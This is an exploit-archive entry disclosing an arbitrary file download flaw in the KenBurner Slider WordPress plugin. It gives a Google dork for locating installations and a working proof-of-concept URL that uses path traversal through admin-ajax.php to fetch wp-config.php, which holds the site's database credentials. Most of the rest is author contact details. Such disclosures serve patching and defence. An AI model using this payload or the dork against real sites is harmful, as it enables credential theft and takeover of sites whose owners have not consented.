WordPress KenBurner Slider Arbitrary File Download

2014.08.26
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability # Google Dork: Index of /wp-content/plugins/kbslider # Date: 2014-08-21 # Exploit Author: MF0x and Daniel Pentest # Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 # Version: All # Tested on: Windows 7 / Google Chrome Description: The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability Proof of Concept (PoC): http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php # Discovered by: MF0x and Daniel Pentest # Website: http://www.null-source.blogspot.com.br/ # Email: daniel@analistadesistema.net # Twitter: https://twitter.com/danielpentest # YouTube: https://www.youtube.com/danielpentest # GitHub: https://github.com/danielpentest # Twitter: https://twitter.com/danielpentest # Pastebin: http://pastebin.com/u/MF0x_


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top